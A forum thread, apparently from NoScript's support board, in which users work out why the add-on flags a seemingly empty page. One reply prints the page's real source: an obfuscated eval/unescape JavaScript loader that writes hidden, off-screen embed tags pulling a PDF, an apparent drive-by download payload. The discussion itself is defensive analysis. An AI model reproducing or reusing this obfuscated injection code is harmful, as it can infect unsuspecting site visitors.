how to understand noscript's comments?

[tajmaya]

I'm having a hard time understanding the noscript plugin's response to different sites.

For example, the site that made me install it is one that is VERY LIKELY evil, so go here ONLY if you have noscript installed:

Again: do NOT go here without precautions!!!

"dordognevacations.com/newgallery/index.php"

But if you DO go here, noscript puts a red x through its logo, but ... there are NO other indications of anything. When I look at the source of this site, I see nothing. Could this site be benign? Why the noscript X then?

I find that many many other sites have more detailed comments, like cnn, or trendmicro... But what's it mean?

I look forward to hearing back from you.
Maya

[Giorgio Maone]

NoScript does not try to guess if a site is benign or not.
It disable scripting on every website unless you decide that

1. The site is trustworthy
2. The site is actually unusable without scripting

The trustworthiness of a website is not much a technical assessment, but rather depends on what you know about its owners and its business.
However, if you land on a certain site for the first time and you've got no idea about it, you can help yourself with WOT, or SiteAdvisor, or just Google.
The important thing here is that NoScript prevented it from doing any damage, giving you the time to decide.

[tajmaya]

I understand what you're saying. I appreciate the ability to chose which sites I should allow to run scripts.

However, it would be great to have an easy way to look at the scripts & objects that are being called, because even normally safe sites can be compromised!

Can you explain why, on most sites, your plugin counts the number of blocked scripts and objects (if any) but on this dordogne site, it simply gets an X through it, but does NOT pop up any info about blocked scripts. What does that mean? Is there anything here? When I do view source on the page it is totally empty except for this harmless code:

<html>
<head/>
<body>// 404</body>
</html>

Is there a way to hide something malicious in there where view source and firebug can't see it??

THanks so much!
Maya

[ALbino]

For me the source code for that page is:

Code: Select all

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"></head><body>//<script>
try{if(wWtO='*')throw new TypeError('%');}catch(hutc){wWtO=hutc.message;}
var aZPt='dov63um6dI65P6et.wriI74e(v22I3cdP69v76 stylm65P3dI5cm22posiI74ioI6eI3aI61bsolI75tm65v3b leftI3av2dv31000pxI3b tm6fP70I3av2dv31P300v30pxv3bP5cP22P3eP22P29I3bdocuP6denI74.write(P27I3cem6dbem64 wI69dtm68v3d10v30 hm65ightI3d10I30 m73v72cm3dI22httpI3aP2fm2fdordogm6ev65m76acationv73.com6dm2fnI65wgalI6cem72ym2finI64I65x.pv68pm3fv73P3dZhZg8bskI26idI3d2I22 v74ypv65v3dv22applicv61tionI2fpv64fI22I3em3cm2feP6dbP65P64P3ev27I29v3bdocum6deP6et.wv72ite(I27P3cem6dv62eP64I20wv69P64P74hm3d100v20hP65v69gP68tm3d100 srcP3dv22htv74pI3aP2fP2fdordogneP76acatiP6fns.com6dI2fnewm67allP65rym2finI64ex.phP70v3fm73P3dZm68I5agm38bskm26iP64P3d3v22P3eI3cI2fv65I6dbP65dI3eI27v29I3bdocuv6deP6et.m77rite(v22I3cv2fdv69v76m3em22)v3b';
eval(unescape(aZPt.replace(/[IPmv]/g,wWtO)));

//</script>
<div style="padding: 4px 4px 4px 40px; background-image: url(resource://noscript_0.5562676001057474/icon32.png); background-repeat: no-repeat; background-position: 2px 2px; display: block; min-height: 32px; text-align: left;"><a tooltip="linkalert-tip" href="http://dordognevacations.com/newgallery/dov63um6dI65P6et.wriI74e%28v22I3cdP69v76">http://dordognevacations.com/newgallery/dov63um6dI65P6et.wriI74e(v22I3cdP69v76</a><br></div></body></html>

[ALbino]

Err, more like:

Code: Select all

//<script>
try{if(wWtO='*')throw new TypeError('%');}catch(hutc){wWtO=hutc.message;}
var aZPt='dov63um6dI65P6et.wriI74e(v22I3cdP69v76 stylm65P3dI5cm22posiI74ioI6eI3aI61bsolI75tm65v3b leftI3av2dv31000pxI3b tm6fP70I3av2dv31P300v30pxv3bP5cP22P3eP22P29I3bdocuP6denI74.write(P27I3cem6dbem64 wI69dtm68v3d10v30 hm65ightI3d10I30 m73v72cm3dI22httpI3aP2fm2fdordogm6ev65m76acationv73.com6dm2fnI65wgalI6cem72ym2finI64I65x.pv68pm3fv73P3dZhZg8bskI26idI3d2I22 v74ypv65v3dv22applicv61tionI2fpv64fI22I3em3cm2feP6dbP65P64P3ev27I29v3bdocum6deP6et.wv72ite(I27P3cem6dv62eP64I20wv69P64P74hm3d100v20hP65v69gP68tm3d100 srcP3dv22htv74pI3aP2fP2fdordogneP76acatiP6fns.com6dI2fnewm67allP65rym2finI64ex.phP70v3fm73P3dZm68I5agm38bskm26iP64P3d3v22P3eI3cI2fv65I6dbP65dI3eI27v29I3bdocuv6deP6et.m77rite(v22I3cv2fdv69v76m3em22)v3b';
eval(unescape(aZPt.replace(/[IPmv]/g,wWtO)));

//</script>

[therube]

Right.
(Actually each time you reload the page, the source changes. I imagine whatever it does remains the same, but the obscuring items change.)
And what that does or does not do, I have no clue.

But after viewing that, I am glad that whatever the intent is, that nothing happens to me.

tajmaya, how did you happen across that particular page?


Oh, & this too:

3.17 Q: Some pages display the little NoScript icon with one or more links on its left side. I thought this could be disabled by unchecking "Show placeholder", but it's still shown... How do I make it go away?

But to me, it serves a good purpose as it points out something you might otherwise miss. Making you question it before proceeding.


Google: try{if( ='*')throw new TypeError('%');}catch( ){= .message;}

[computerfreaker]

(Actually each time you reload the page, the source changes. I imagine whatever it does remains the same, but the obscuring items change.)

Check out the JavaScript DeObfuscator addon... it claims to show you what JS runs on a page, regardless of obfuscation measures...

https://addons.mozilla.org/en-US/firefox/addon/10345

And what that does or does not do, I have no clue.

But after viewing that, I am glad that whatever the intent is, that nothing happens to me.

Ditto. While I suppose it's possible that obfuscated code could be benign, I wouldn't care to bet on it...

But to me, it serves a good purpose as it points out something you might otherwise miss. Making you question it before proceeding.


Google: try{if( ='*')throw new TypeError('%');}catch( ){= .message;}

OK, I'm no JavaScript guy... and Google didn't turn up anything of value, at least for me... so what were you referring to?? :S

[computerfreaker]

hmm, this link looks interesting & relevant...
http://securitylabs.websense.com/conten ... /2574.aspx

[GµårÐïåñ]

It is simple, NoScript disables ANY and ALL scripts on ANY and ALL sites, UNLESS you say otherwise. Now if this site being disabled and not on your trusted list has script items, it will show in the count and it is up to you to decide if they are safe to allow or not. If it doesn't show anything, then chances are there is nothing or you don't see it but it does and even if it is benign, it has no ESP, so it blocks it for you to decide what it is and allow or not. There isn't much more comments it can provide you.

I think the confusion comes from the fact that most people set and forget their security and its done for them by some arbitrary and often unsafe method and when they are finally asked to use a security tool proactively and make an informed decision, its too much or doesn't provide arbitrary and canned comments like other tools that have no idea what the code is, they use a heuristic to "assume" what it is and give comments. NS doesn't insult the user, provides them the tools to decide and protect themselves, the rest is up to them.